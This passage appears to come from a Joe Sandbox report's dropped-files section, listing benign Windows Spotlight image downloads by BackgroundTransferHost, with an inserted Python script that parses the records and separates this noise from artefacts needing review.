                                                                                                                        Entropy (8bit):7.7771944987396555
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:/ELaBE1ZTI1vJqS1WgOmA7l8uyksA+IHt3xQio2GqFrg+CoMSIsLvMJ7xOoHZ:SyrqSHOr/eBINa0GqFrg+x4sWUsZ
                                                                                                                        MD5:23F1E3C2429113D51CE85214A3EAA63C
                                                                                                                        SHA1:A4E2DA580347C6039F9145C3B8CAA960AB50762B
                                                                                                                        SHA-256:4C831289763620D63766F8C5E97CA92AB7AF0EEA912147C733FF447B1E476656
                                                                                                                        SHA-512:840EEDE18168026B2E48CE951A4F796D43FDA8E2C1E12F36D25AF6ED4C041E8F3B26B5D3A824AD41E22FF9B24A31EF9A79D6A8014AE6F3A32EC8D28217391DCA
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: ......JFIF.....`.`.....C....................................................................C.........................................................................8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...T..-..y.......0..j...H.t..t_.]V.%..?.!.G........o....O&.;.}.<.W.........|....y.G&.......X.|34.i.s...{.g..e.....O..........yj..}..H.??.........U..S.^.......(....G.o..2|.......Q..o<m.....<....\l;.H$..H.....WY....}.$..wd.^.....%?z..9)....=.e(.j...sz..qk.1.wWv..:I'.k..K.....c.-.....e.^.}.>;./.u.TK..#.....Q.mJu.8.v..$o.U.F.......Z.n..j.-..k$q......7.m,......8..R
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\28f286d4-7ba8-4d17-bd00-f85bb8c939a2.cc9fc646-c2fc-4fa6-88b0-56f3d96acf5a.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.5969448589373916
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRiDTXWzgx71+A8tzsafc+Oc2CpXpjjX+vUViXBGX3xbHckwU:LLD2mRiHwgvL8ZrfeIXpjjX+v8iXBGXJ
                                                                                                                        MD5:E88A4678CD98FF4C33ABE52268A7C0F1
                                                                                                                        SHA1:0ACC06763288CBD46231C1359D8C515A8F9E5DBF
                                                                                                                        SHA-256:BDBA791D2D197B661BA522F55DE509508C61FB7A3ADB24C187CF9F51E56C6E86
                                                                                                                        SHA-512:5A99D466C70AC3D5F0276E05EDF359450D3625FF6951226ADB2DDE453FB3BB06FABA7F97F4F4A1DA3738225BFC82313F864C9A8D8272A4380D90D4534882ECBB
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.u.h.o.?.v.e.r.=.a.d.3.8...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.h.u.,. .1.3. .J.a.n. .2.0.2.2. .2.3.:.2.1.:.5.3. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .4.0.d.b.9.f.5.a.-.0.5.5.5.-.4.3.6.a.-.b.6.3.5.-.c.c.b.9.6.e.b.b.8.e.9.5...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.u.h.o.?.v.e.r.=.a.d.3.8...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .1.7.2.7.9.8.7...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .1.7.2.7.9.8.7...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\28f286d4-7ba8-4d17-bd00-f85bb8c939a2.down_data
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 21.1 (Windows), datetime=2020:08:25 09:19:56]
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1727987
                                                                                                                        Entropy (8bit):7.00466959635563
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:04jNiVr4qua18zGlkrZEJEKBcM/pra/R0DGoGaGZUWcId0nR2pN6oyD3KVRIHZFm:04jNiVr4qWG5PS5p8oyWzcbX9KPt
                                                                                                                        MD5:16F8C62F063EB2B648E854B2DC08959A
                                                                                                                        SHA1:166743B3BCC6B7D50C507D2522E8F3C644D720A9
                                                                                                                        SHA-256:FB91AA134CD79665B6133C8943A052BBF660F21FC42FDD0FAFC78213DD3850B6
                                                                                                                        SHA-512:801930F6ED038B9E489D4A900DE52116989FF2CD938B42C8FB690E3CD431756777DC65DA5B0821D4FC55A95538388D0EDD32B51E9C81CA198F75F0BB55A7A1BD
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: ......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 21.1 (Windows).2020:08:25 09:19:56.............................8..........................................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................Z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...HEc......%?.*2.L..LC .*.9..RhD....5b...$.3'F.N.FeJ#L......>.:..1....0....R..q}....-.1......T............m.... ..h(..5...... "4....x....'.."...X:...
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\4fca2ad7-819f-4ce7-871e-d7f95abce2d8.701c9b8b-e624-449d-a7f7-5920d87b9fa6.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.596377708245441
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRiJTyWzgx71+XxPWJsafc+Oc2CpXpjjX+vUVi9BKkX3KPbDkwU:LLD2mRiNZgvIOJrfeIXpjjX+v8i9BKkX
                                                                                                                        MD5:0FE0FF6CA45026CD1EBF503AC1ACEBFB
                                                                                                                        SHA1:EF50B263F19557055B5532596B2D25AD258675A9
                                                                                                                        SHA-256:EBAA06E959ED054EC3F00769234D5D05D09996EF388448147655EEBA2488483F
                                                                                                                        SHA-512:4FA7BF1964C753E5E21CB8610186FDA56210CE8F83733389FC2E8133D2AE694E97BE508026437168EE5480E38EC1A293AB82B5A62D2FD22E192C2EB5F3C1E05E
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.8.k.k.?.v.e.r.=.8.c.6.2...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.h.u.,. .1.3. .J.a.n. .2.0.2.2. .1.7.:.1.1.:.1.0. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .4.e.0.a.9.3.4.6.-.0.9.9.0.-.4.3.c.9.-.8.3.2.3.-.2.1.8.3.5.2.0.d.5.6.b.3...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.8.k.k.?.v.e.r.=.8.c.6.2...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .1.8.2.9.9.9.4...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .1.8.2.9.9.9.4...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\4fca2ad7-819f-4ce7-871e-d7f95abce2d8.up_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):276
                                                                                                                        Entropy (8bit):3.40203749325483
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQi9nBo:ZxMghwLtHSM1Sb9mSMXAvO
                                                                                                                        MD5:35DBDA98AE9B6FC0283A5A4C9C4AAC23
                                                                                                                        SHA1:D3DD940A127CFAE4DBC453D02027D7DB06D17ADB
                                                                                                                        SHA-256:3284A5D8408366FE712154660CA3C5723327F1F8B1E5E2573941670F2DD403EC
                                                                                                                        SHA-512:BF0901B36FC704DCF76AE93483D6DF36919B5DB3F0F92ECD083D7A44416926906F948A1BF3B16033EE375F27B634B5B81ED52DD55B4ABDE93FC0613BB74AEE62
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.8.k.k.?.v.e.r.=.8.c.6.2...........
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\5c717cc5-fa43-4679-9bd0-506e2460bd23.d8889b23-4a02-470f-833a-b67283ec1ed8.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.5913432744209213
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRivWzgx71+BqCTsafc+Oc2CpXpjjX+vUViZZBz5RX3z5Wbb/TeL:LLD2mRiYgv+PTrfeIXpjjX+v8i3Bz5R9
                                                                                                                        MD5:493F4DB619E362FC37095C0C075926CF
                                                                                                                        SHA1:69543AA935B7B1B1E76D9CAA1126608C2478956C
                                                                                                                        SHA-256:712BBF489C3EE89C2414725C89293818922B75D5B6E84B4759DE66D57439FBA3
                                                                                                                        SHA-512:7C7173FEDF919C56EF02A12707F19A15C532C4AB14D215A426C2319D1DBC7ECB9435D5623DC434B527F3DA964709BF6D6411014AFD518C4472B981F1208DD47A
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.9.e.R.?.v.e.r.=.b.7.f.9...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.u.e.,. .1.1. .J.a.n. .2.0.2.2. .2.1.:.0.0.:.0.8. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .f.6.2.e.3.8.8.7.-.f.f.b.c.-.4.d.9.3.-.8.c.f.8.-.a.9.a.a.7.a.e.8.4.6.3.b...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.9.e.R.?.v.e.r.=.b.7.f.9...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .1.8.3.7.1.1.3...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .1.8.3.7.1.1.3...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\5c717cc5-fa43-4679-9bd0-506e2460bd23.up_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):276
                                                                                                                        Entropy (8bit):3.426779962179868
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQiLAoMc:ZxMghwLtHSM1Sb9mSMXAv00
                                                                                                                        MD5:CF061E37763127705F0C30EE3B8AB460
                                                                                                                        SHA1:569CE40921461B1DDBFAC8B87D2E41590275CB05
                                                                                                                        SHA-256:5E635F4078440F931BFDF334D1F2EFF8B291BCD73680FF84FE0020BC06C5A944
                                                                                                                        SHA-512:28D7B7A8CF655B78218562B8430E8461B5C1CBD072B0FBCB60E4F595B74DE7ADDB6A8F18E04EE0C0E216FA16794ED8574D1768B1360AB4EF45CC282CC761E763
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.9.e.R.?.v.e.r.=.b.7.f.9...........
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\6f37363b-c375-4b45-91f9-ec727d246644.c7c3e4c9-bbf8-40be-800f-a09c9aae178d.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1218
                                                                                                                        Entropy (8bit):3.589442580791056
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRipcTpWzgx71+8zsafc+Oc2CpXpPkX+vUViiBg5X3gebiL:LLD2mRiS6gvNzrfeIXpPkX+v8iiBg5Xq
                                                                                                                        MD5:ED6375356DBE3105FB3C6C285BB7BB61
                                                                                                                        SHA1:5B44C771F10C06AB6630EA9415D22B0ABF5072D9
                                                                                                                        SHA-256:B910022E06D2F1FEB8D961628DBA6EF12A63A492182EEBEE6C33077E6035BD0B
                                                                                                                        SHA-512:6525445A1750C62123EC52C830F22F93D79ABA02468C9A5E07ED49AE829EC4A1F1AE3B228DB239B867279134BF5C6FE3C97A3E44B2B64C3AFC62969D774D0391
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.8.j.Z.?.v.e.r.=.e.e.7.1...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.h.u.,. .1.3. .J.a.n. .2.0.2.2. .1.1.:.5.7.:.3.3. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .e.d.f.f.1.b.c.b.-.c.f.5.5.-.4.8.c.8.-.8.7.e.6.-.a.d.0.4.2.6.9.c.4.b.e.9...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.p.n.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.8.j.Z.?.v.e.r.=.e.e.7.1...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .1.5.5.2.0...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .1.5.5.2.0...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.l.i.c.,. .
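The BackgroundTransferHost.exe drops listed above are Windows Content Delivery Manager (Spotlight lock-screen image) transfers, not artefacts of the sample: each `<guid>.<guid>.down_meta` holds the request URL and response headers as UTF-16LE text (which the report prints with a '.' for every NUL and control byte), and the paired `<guid>.down_data` is the JPEG or PNG whose size equals the Content-Length in that meta file. The following script is an added example, not part of the report or of Joe Sandbox: it parses the flattened Key:Value records, decodes the dotted previews, verifies the down_meta/down_data pairing, and separates CDM noise from drops that still need a look. It assumes the *_meta previews carry no BOM (text at the even offsets), and the BENIGN_HOSTS allowlist, the `example.bin` / `sample.exe` record and the trimmed preview are constructed for the example; the other values are copied from the entries above.

```python
"""Triage the 'Dropped Files' records of a Joe Sandbox report.

Added example, not part of the report or of Joe Sandbox. Assumes the *_meta
previews are UTF-16LE ASCII without a BOM (text at even offsets, NUL and
control bytes printed as '.'); BENIGN_HOSTS is an allowlist chosen here."""
import re
from urllib.parse import urlparse

FIELD_RE = re.compile(
    r"^(Process|File Type|Category|Size \(bytes\)|Entropy \(8bit\)|Encrypted|"
    r"SSDEEP|MD5|SHA1|SHA-256|SHA-512|Malicious|Reputation|Preview):\s*(.*)$"
)
CDM_DIR = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\BackgroundTransferApi\\"
BENIGN_HOSTS = {"img-prod-cms-rt-microsoft-com.akamaized.net", "image.prod.cms.rt.microsoft.com"}

# Preview of the 21013e79... up_meta file, copied from the report.
UP_META_PREVIEW = (
    "F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E..."
    "G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m..."
    "a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./."
    "R.E.4.C.V.B.5.?.v.e.r.=.d.d.3.a..........."
)

# Constructed sample input in the report's layout: the 27cc05ce... down_meta (preview
# trimmed to four headers) and its down_data from the report, plus one made-up record.
REPORT_EXCERPT = r"""
C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\27cc05ce-f6ae-4e8c-aa08-af3f678f3684.7e4aef61-82dc-4c05-85c3-81f1b0303abe.down_meta
Process:C:\Windows\System32\BackgroundTransferHost.exe
File Type:data
Size (bytes):1228
Malicious:false
Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.Y.e.S.?.v.e.r.=.0.9.d.6...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .F.r.i.,. .1.4. .J.a.n. .2.0.2.2. .1.3.:.0.9.:.4.7. .G.M.T...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .6.4.9.4.2.8...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b
C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\27cc05ce-f6ae-4e8c-aa08-af3f678f3684.down_data
Process:C:\Windows\System32\BackgroundTransferHost.exe
File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1080x1920, frames 3
Size (bytes):649428
Malicious:false
C:\Users\user\AppData\Roaming\example.bin
Process:C:\Users\user\Desktop\sample.exe
File Type:data
Malicious:false
"""


def parse_records(text):
    """One dict per dropped file: a path line followed by Key:Value lines."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()          # the report layout indents every line
        if not line:
            continue
        m = FIELD_RE.match(line)
        if m and cur is not None:
            cur[m.group(1)] = m.group(2)
        else:
            cur = {"Path": line}
            records.append(cur)
    return records


def decode_preview(preview):
    """Keep the even offsets (ASCII bytes of UTF-16LE text); the odd ones are NUL."""
    return preview[::2].rstrip(".")


def parse_meta(decoded):
    """Recover URL and headers. The newline between header lines also printed as '.',
    so split only where a '.' precedes a 'Name: ' token. up_meta reads '<id>.GET.<url>'."""
    parts = re.split(r"\.(?=[A-Za-z-]+: )", decoded)
    m = re.search(r"https?://\S+", parts[0])
    headers = dict(p.partition(": ")[::2] for p in parts[1:])
    return (m.group(0) if m else None), headers


def basename(rec):
    return rec["Path"].rsplit("\\", 1)[-1]


def classify(rec, by_name):
    """('benign-cdm', why) for a consistent CDM transfer, otherwise ('review', why)."""
    name = basename(rec)
    if rec.get("Malicious", "").lower() == "true":
        return "review", "sandbox marked it malicious"
    if not (rec.get("Process", "").lower().endswith("\\backgroundtransferhost.exe")
            and CDM_DIR in rec["Path"]):
        return "review", "not a BackgroundTransferHost transfer under the CDM package"
    if name.endswith("_meta"):
        url, headers = parse_meta(decode_preview(rec.get("Preview", "")))
        host = urlparse(url).hostname if url else None
        if host not in BENIGN_HOSTS:
            return "review", f"unexpected origin {host!r}"
        # '<g1>.<g2>.down_meta' pairs with '<g1>.down_data': the sizes must agree.
        data = by_name.get(name.split(".")[0] + ".down_data")
        length = headers.get("Content-Length")
        if data and length and length != data.get("Size (bytes)"):
            return "review", "down_data size does not match Content-Length"
        return "benign-cdm", f"CDM fetch from {host}"
    if name.endswith(".down_data") and rec.get("File Type", "").startswith(("JPEG", "PNG")):
        return "benign-cdm", "Spotlight image payload"
    return "review", "unrecognised artefact under the CDM package"


def triage(text):
    """Map each dropped file's basename to its (verdict, reason)."""
    records = parse_records(text)
    by_name = {basename(r): r for r in records}
    return {basename(r): classify(r, by_name) for r in records}


if __name__ == "__main__":
    for name, (verdict, why) in triage(REPORT_EXCERPT).items():
        print(f"{verdict:10} {name}: {why}")
```

Paste the whole dropped-files section into `triage()` and only the `review` verdicts need an analyst; a CDM record whose origin is not on the allowlist, or whose image size disagrees with the headers, is exactly the case where something else used the BackgroundTransferApi folder and should not be waved through as Spotlight noise.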
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\6f37363b-c375-4b45-91f9-ec727d246644.up_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):276
                                                                                                                        Entropy (8bit):3.4307777993094337
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQi9nOxzX:ZxMghwLtHSM1Sb9mSMXAvN
                                                                                                                        MD5:4ADC4A45A014F77488BFC079F95EB4D0
                                                                                                                        SHA1:4B9467083C60E6D721E714FBC7B1940421B758CB
                                                                                                                        SHA-256:917FDDAA8EBC6C91DB178BAF7353B9BD01EA1C5DCE9DE8AA555647277C3E021F
                                                                                                                        SHA-512:5C958A1C5C610F00DD5B8543699A98E325A7E9674770975D8091BFBCE58EA59811DF813E2CD7F79E09E7738F1A3F535B4B038FE11D7B8406F80E700523FAABD9
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.8.j.Z.?.v.e.r.=.e.e.7.1...........
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\7e716a44-d46f-42ba-819e-1ad870190297.cc9fc646-c2fc-4fa6-88b0-56f3d96acf5a.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.5969448589373916
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRiDTXWzgx71+A8tzsafc+Oc2CpXpjjX+vUViXBGX3xbHckwU:LLD2mRiHwgvL8ZrfeIXpjjX+v8iXBGXJ
                                                                                                                        MD5:E88A4678CD98FF4C33ABE52268A7C0F1
                                                                                                                        SHA1:0ACC06763288CBD46231C1359D8C515A8F9E5DBF
                                                                                                                        SHA-256:BDBA791D2D197B661BA522F55DE509508C61FB7A3ADB24C187CF9F51E56C6E86
                                                                                                                        SHA-512:5A99D466C70AC3D5F0276E05EDF359450D3625FF6951226ADB2DDE453FB3BB06FABA7F97F4F4A1DA3738225BFC82313F864C9A8D8272A4380D90D4534882ECBB
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
